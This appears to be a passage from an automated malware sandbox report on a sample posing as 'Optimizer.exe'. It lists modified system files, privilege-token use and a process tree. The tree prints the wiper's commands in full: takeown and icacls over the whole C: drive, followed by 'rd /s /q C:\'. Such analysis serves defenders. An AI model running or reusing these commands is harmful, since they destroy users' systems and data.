C:\Windows\servicing\LCU\PACKAG~1.3\MI8AE9~1.MUM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\MI82D0~1.CAT cmd.exe File opened for modification C:\Windows\servicing\Packages\Microsoft-Windows-Security-AADBrokerPlugin-Package~31bf3856ad364e35~amd64~~10.0.22000.258.cat cmd.exe File opened for modification C:\Windows\servicing\Packages\MI5845~1.MUM cmd.exe File opened for modification C:\Windows\WinSxS\AMFDF0~1.1_J\DMWAPP~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\AM0530~1.1_D\STORAG~1.MUI cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMF902~1.MAN cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMB1AC~1.493\f\Assets\LOCKSC~1.PNG cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\CO304D~1.MUM cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AM62F6~1.MAN cmd.exe File opened for modification C:\Windows\servicing\LCU\PACKAG~1.3\AMB1AC~1.493\f\FILEEX~1\Assets\images\CONTRA~3\WIC75C~1.SVG cmd.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
takeown.exedescription pid Process Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
Optimizer.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1716 wrote to memory of 3524 1716 Optimizer.exe 80 PID 1716 wrote to memory of 3524 1716 Optimizer.exe 80 PID 3524 wrote to memory of 5028 3524 cmd.exe 81 PID 3524 wrote to memory of 5028 3524 cmd.exe 81 PID 3524 wrote to memory of 3496 3524 cmd.exe 82 PID 3524 wrote to memory of 3496 3524 cmd.exe 82 PID 1716 wrote to memory of 2068 1716 Optimizer.exe 84 PID 1716 wrote to memory of 2068 1716 Optimizer.exe 84 PID 2068 wrote to memory of 2528 2068 cmd.exe 85 PID 2068 wrote to memory of 2528 2068 cmd.exe 85 PID 1716 wrote to memory of 3340 1716 Optimizer.exe 86 PID 1716 wrote to memory of 3340 1716 Optimizer.exe 86 PID 3340 wrote to memory of 3084 3340 cmd.exe 87 PID 3340 wrote to memory of 3084 3340 cmd.exe 87 PID 1716 wrote to memory of 420 1716 Optimizer.exe 88 PID 1716 wrote to memory of 420 1716 Optimizer.exe 88 PID 420 wrote to memory of 4396 420 cmd.exe 89 PID 420 wrote to memory of 4396 420 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\Optimizer.exe"C:\Users\Admin\AppData\Local\Temp\Optimizer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 65001 && cls && title PC FUCKER OPTIMIZER && color 0B && mode 145,302⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:5028
-
-
C:\Windows\system32\mode.commode 145,303⤵PID:3496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start /B takeown /f C:\ /r /d y2⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\takeown.exetakeown /f C:\ /r /d y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start /B icacls C:\ /grant administrators:F /t2⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\system32\icacls.exeicacls C:\ /grant administrators:F /t3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start /B cmd /c rd /s /q C:\2⤵
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Windows\system32\cmd.execmd /c rd /s /q C:\3⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies termsrv.dll
- Drops file in Program Files directory
- Drops file in Windows directory
PID:4396
-
-